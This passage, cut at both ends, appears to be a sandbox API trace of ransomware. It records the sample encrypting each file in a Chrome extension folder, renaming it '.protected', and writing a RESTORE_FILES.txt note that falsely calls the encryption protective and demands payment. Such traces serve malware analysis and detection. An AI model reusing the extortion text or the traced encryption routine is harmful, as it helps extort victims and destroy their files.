data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log") returned 148 [0084.167] StrStrW (lpFirst="000003.log", lpSrch=".txt") returned 0x0 [0084.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log") returned 148 [0084.167] StrStrW (lpFirst="000003.log", lpSrch=".rar") returned 0x0 [0084.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log") returned 148 [0084.167] StrStrW (lpFirst="000003.log", lpSrch=".zip") returned 0x0 [0084.167] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0x0, lpOverlapped=0x0) returned 1 [0084.167] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.167] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0x0, lpOverlapped=0x0) returned 1 [0084.167] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.167] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: 
lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.168] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.168] CloseHandle (hObject=0x15c) returned 1 [0084.169] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log.protected") returned 158 [0084.169] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log.protected")) returned 1 [0084.170] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.170] lstrcmpiW (lpString1="CURRENT", lpString2="Windows") returned -1 [0084.170] lstrcmpiW (lpString1="CURRENT", lpString2="Program Files") returned -1 [0084.170] lstrcmpiW (lpString1="CURRENT", lpString2="Program Files (x86)") returned -1 [0084.170] lstrcmpiW (lpString1="CURRENT", lpString2="$Recycle.bin") returned 1 [0084.170] lstrcmpiW (lpString1="CURRENT", lpString2="System Volume Information") returned -1 [0084.170] wnsprintfW (in: pszDest=0x4cfb68, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT") returned 145 [0084.170] StrStrIW (lpFirst="CURRENT", lpSrch=".protected") returned 0x0 [0084.170] lstrcmpW (lpString1="CURRENT", lpString2="RESTORE_FILES.txt") returned -1 [0084.170] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.170] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.170] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT") returned 145 [0084.170] StrStrW (lpFirst="CURRENT", lpSrch=".txt") returned 0x0 [0084.170] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT") returned 145 [0084.171] StrStrW (lpFirst="CURRENT", lpSrch=".rar") returned 0x0 [0084.171] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT") returned 145 [0084.171] StrStrW 
(lpFirst="CURRENT", lpSrch=".zip") returned 0x0 [0084.171] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0x10, lpOverlapped=0x0) returned 1 [0084.172] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.172] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0x10, lpOverlapped=0x0) returned 1 [0084.172] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.172] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.172] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.172] CloseHandle (hObject=0x15c) returned 1 [0084.172] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT.protected") returned 155 [0084.172] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\current"), 
lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\current.protected")) returned 1 [0084.173] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.173] lstrcmpiW (lpString1="LOCK", lpString2="Windows") returned -1 [0084.173] lstrcmpiW (lpString1="LOCK", lpString2="Program Files") returned -1 [0084.173] lstrcmpiW (lpString1="LOCK", lpString2="Program Files (x86)") returned -1 [0084.173] lstrcmpiW (lpString1="LOCK", lpString2="$Recycle.bin") returned 1 [0084.173] lstrcmpiW (lpString1="LOCK", lpString2="System Volume Information") returned -1 [0084.173] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK") returned 142 [0084.173] StrStrIW (lpFirst="LOCK", lpSrch=".protected") returned 0x0 [0084.173] lstrcmpW (lpString1="LOCK", lpString2="RESTORE_FILES.txt") returned -1 [0084.173] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.173] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\lock"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.174] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK") returned 142 [0084.174] StrStrW (lpFirst="LOCK", lpSrch=".txt") returned 0x0 [0084.174] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK") returned 142 [0084.174] StrStrW (lpFirst="LOCK", lpSrch=".rar") returned 0x0 [0084.174] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK") returned 142 [0084.174] StrStrW (lpFirst="LOCK", lpSrch=".zip") returned 0x0 [0084.174] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0x0, lpOverlapped=0x0) returned 1 [0084.174] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.174] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0x0, lpOverlapped=0x0) returned 1 [0084.174] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.174] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.175] WriteFile (in: hFile=0x15c, 
lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.175] CloseHandle (hObject=0x15c) returned 1 [0084.175] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK.protected") returned 152 [0084.175] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\lock"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\lock.protected")) returned 1 [0084.176] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.176] lstrcmpiW (lpString1="LOG", lpString2="Windows") returned -1 [0084.176] lstrcmpiW (lpString1="LOG", lpString2="Program Files") returned -1 [0084.176] lstrcmpiW (lpString1="LOG", lpString2="Program Files (x86)") returned -1 [0084.176] lstrcmpiW (lpString1="LOG", lpString2="$Recycle.bin") returned 1 [0084.176] lstrcmpiW (lpString1="LOG", lpString2="System Volume Information") returned -1 [0084.176] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension 
Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG") returned 141 [0084.176] StrStrIW (lpFirst="LOG", lpSrch=".protected") returned 0x0 [0084.176] lstrcmpW (lpString1="LOG", lpString2="RESTORE_FILES.txt") returned -1 [0084.176] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.176] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG") returned 141 [0084.176] StrStrW (lpFirst="LOG", lpSrch=".txt") returned 0x0 [0084.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG") returned 141 [0084.176] StrStrW (lpFirst="LOG", lpSrch=".rar") returned 0x0 [0084.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG") returned 141 [0084.176] StrStrW (lpFirst="LOG", lpSrch=".zip") returned 0x0 [0084.176] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: 
lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0xc4, lpOverlapped=0x0) returned 1 [0084.177] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffff3c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.177] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0xc4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0xc4, lpOverlapped=0x0) returned 1 [0084.178] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.178] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.178] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.178] CloseHandle (hObject=0x15c) returned 1 [0084.178] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.protected") returned 151 [0084.178] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.protected" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log.protected")) returned 1 [0084.179] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.179] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Windows") returned -1 [0084.179] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Program Files") returned -1 [0084.179] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Program Files (x86)") returned -1 [0084.179] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="$Recycle.bin") returned 1 [0084.179] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="System Volume Information") returned -1 [0084.179] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001") returned 153 [0084.179] StrStrIW (lpFirst="MANIFEST-000001", lpSrch=".protected") returned 0x0 [0084.179] lstrcmpW (lpString1="MANIFEST-000001", lpString2="RESTORE_FILES.txt") returned -1 [0084.179] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.179] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001") returned 153 [0084.179] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".txt") returned 0x0 [0084.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001") returned 153 [0084.179] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".rar") returned 0x0 [0084.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001") returned 153 [0084.179] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".zip") returned 0x0 [0084.179] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0x29, lpOverlapped=0x0) returned 1 [0084.180] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffffd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.180] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0x29, lpOverlapped=0x0) returned 1 [0084.180] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.181] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.181] WriteFile (in: 
hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.181] CloseHandle (hObject=0x15c) returned 1 [0084.181] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001.protected") returned 163 [0084.181] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\manifest-000001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\manifest-000001.protected")) returned 1 [0084.181] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0084.181] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0084.182] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\RESTORE_FILES.txt") returned 155 [0084.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension 
Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.182] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and 